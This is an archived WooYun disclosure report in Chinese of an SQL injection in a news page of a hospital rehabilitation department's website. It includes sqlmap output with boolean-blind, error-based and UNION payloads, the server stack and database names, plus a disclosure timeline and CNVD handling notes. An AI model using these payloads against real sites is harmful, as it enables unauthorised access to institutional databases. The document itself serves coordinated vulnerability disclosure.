乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
南方医科大学第三附属医院康复医学科存在SQL注入
注入点:http://**.**.**.**/news_show.php?id=151
sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=151 AND 8618=8618 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=151 AND (SELECT 5475 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(5475=5475,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: id=151 UNION ALL SELECT CONCAT(0x7162766271,0x4b4764666f766358475a,0x7162707871)-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.28back-end DBMS: MySQL 5.0sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=151 AND 8618=8618 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=151 AND (SELECT 5475 FROM(SELECT COUNT(*),CONCAT(0x7162766271,(SELECT (ELT(5475=5475,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: id=151 UNION ALL SELECT CONCAT(0x7162766271,0x4b4764666f766358475a,0x7162707871)-- ---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.28back-end DBMS: MySQL 5.0available databases [3]:[*] information_schema[*] test[*] vps17447
危害等级:中
漏洞Rank:8
确认时间:2015-11-27 15:07
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给广东分中心,由广东分中心后续协调网站管理单位处置。
暂无